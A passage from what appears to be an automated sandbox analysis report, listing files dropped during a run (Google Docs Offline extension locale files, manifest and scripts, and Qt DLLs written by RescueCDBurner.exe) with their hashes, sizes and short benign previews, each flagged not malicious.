                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2598912
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6049974235008655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                                                                                                                          MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                                                                                                                          SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                                                                                                                          SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                                                                                                                          SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8581632
                                                                                                                                                                                                                                                                          Entropy (8bit):6.736578346160889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                                                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                                                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                                                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                                                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
